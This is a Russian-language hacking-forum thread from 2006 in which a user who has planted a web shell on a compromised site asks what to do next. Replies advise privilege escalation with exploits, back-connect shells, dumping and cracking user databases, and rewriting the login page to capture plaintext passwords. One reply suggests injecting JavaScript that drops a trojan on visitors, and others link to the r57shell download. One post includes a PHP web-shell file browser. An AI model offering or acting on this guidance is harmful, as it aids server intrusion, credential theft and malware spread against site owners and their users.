Залил шелл, что дальше ?

Discussion in 'PHP' started by NIGHT_WOLF, 4 Nov 2006.

  1. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Залил на сайт шелл через уязвимость в форуме.
    Дефейсить не интересно.
    Можно как то поднять права выше, получить хостера ?
    Что вообще можно получить с этого шела ?
     
  2. k1U$4@

    [email protected] New Member

    Joined:
    26 Oct 2006
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    вопрос: зачем залил: спортивный интерес или кровная месть???

    если интерес: ну поройся там, сям, поищи инфу какую нить, залей еще чего-нить интересное, когда админ ету дырку заклеет, залезть опять, админ точно повесится...

    месть? куси и кроши шоб ни кусочка не осталось, тока покоцаная главная страничка с надписью

    " ЗДЕСЬ БЫЛ ВАСЯ :) "

    З.Ы. тока лучше не тяни... обломают.
     
  3. k1U$4@

    [email protected] New Member

    Joined:
    26 Oct 2006
    Messages:
    19
    Likes Received:
    3
    Reputations:
    0
    З.З.Ы. ну, инфа - самое наверное важное: номера, аси, пароли и прочая по@бень...
     
  4. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    для начала глянь версию операционки, потом поищи сплойты под эту версию. Потом бекконнект тебе в руки и юзай сплойт. а вообще вот почитай

    http://hackedpro.org/forum/showthread.php?t=7
     
  5. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    uname -a выдаёт
    FreeBSD voleri-a.*****.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #0: Tue Oct 3 18:28:07 MSD 2006 [email protected]*****.ru:/usr/obj/usr/src/sys/work amd64
    Система я так понял FreeBSD 6.2-PRERELEASE искал на неё сплоиты но не нашёл, есть только для 6.1 и ниже.
    Базы данных форума и сайта я слил, потом буду расшифровывать.
    Крушить ничего не хочу, хочется что нибудь полезного с этого поиметь.
    А что такое бекконнект ?
     
    1 person likes this.
  6. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    737
    Likes Received:
    270
    Reputations:
    59
    На тачке открывается порт для подключения к которому ты и конеектишся. И дальше работаеш через консоль.
     
  7. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Ставь прокси))
    Делай дамп баз! посмотри мож в них че интересное)) ну как минимум спам база уже будет!
    Можеш в гланую страничку добавить Java Script который будет загружать и запускать троянца на комп жертв))
     
  8. swf

    swf New Member

    Joined:
    4 Nov 2006
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    А откуда кстати можно хороший backconect слить??
     
  9. steamer

    steamer Elder - Старейшина

    Joined:
    3 May 2006
    Messages:
    44
    Likes Received:
    7
    Reputations:
    1
    в продолжение темы. А какой прокси посоветуете ставить, а то у меня таже ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.
     
  10. steamer

    steamer Elder - Старейшина

    Joined:
    3 May 2006
    Messages:
    44
    Likes Received:
    7
    Reputations:
    1
    в продолжение темы. А какой прокси посоветуете ставить, а то у меня та же ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.
     
  11. Talisman

    Talisman Elder - Старейшина

    Joined:
    22 Apr 2006
    Messages:
    400
    Likes Received:
    151
    Reputations:
    80
    если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде, затем проверяются эти пароли на юзерские аськи, мыла etc ))) (чтоб хеши не брутить) (и если прав на перехапись скриптов хватает)
     
    1 person likes this.
  12. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    3Proxy Статья
     
  13. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Не подскажешь где про это можно почитать ?
    Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)
     
    #13 NIGHT_WOLF, 5 Nov 2006
    Last edited: 5 Nov 2006
  14. flipper

    flipper Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    131
    Likes Received:
    85
    Reputations:
    29
    http://rst.void.ru/download/r57shell.txt.gz
    http://rst.void.ru/r57shell_create.php
    А по мне лучше: http://www.security-teams.net/index.php?showtopic=3429
     
    1 person likes this.
  15. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    вот держи небольшой проводник:
    PHP:
    <?php
     
    if(!isset($_GET['dir']))
       
    $_GET['dir']='.';
       if(
    is_dir($_GET['dir']))
     {
      print 
    "<body bgcolor=d0d0d0><table><tr><td align=center><b>[имя]</b></td><td align=center><b>[права]</b></td><td align=center><b>[размер]</b></td><tr>";
         
    $dira=opendir($_GET['dir']);
         while (
    false!==(($file readdir($dira))))
         {  
         if(
    $file=='.')
           continue;
          
    $fs="-";
           if(
    is_dir($file))////есле папка/////
                
    echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=660000>$file</font></a></td><td align=center><br>";
              else 
            {
             echo 
    "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=006600>$file</font></a></td><td align=center>-<br>";
              
    $fs=filesize($_GET['dir']."/$file");
                 if(
    $fs!=0)
                   {
                    
    $ost=$fs%1024;
                    
    $fs-=$ost;
                    if(
    $fs!=0)
                      
    $fs/=1024;
                    else 
    $fs=1;
                    }
              }
              if(
    is_readable($file)) echo "r"; else echo "-";
              if(
    is_writable($file)) echo "w"; else echo "-";
              if(
    is_executable($file)) echo "x"; else echo "-";
               echo 
    "</td><td align=center>$fs</td></tr>";            
            }
         }
         else 
         {
         print 
    "<pre>";
         foreach(
    file($_GET['dir']) as $val)
         echo 
    htmlspecialchars($val);
         print 
    "</pre>";
         }
    ?> 
     
    #15 nc.STRIEM, 12 Nov 2006
    Last edited: 12 Nov 2006
    1 person likes this.
  16. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    2GrAmOzEkA вот и ответ Permission denied!
     
Loading...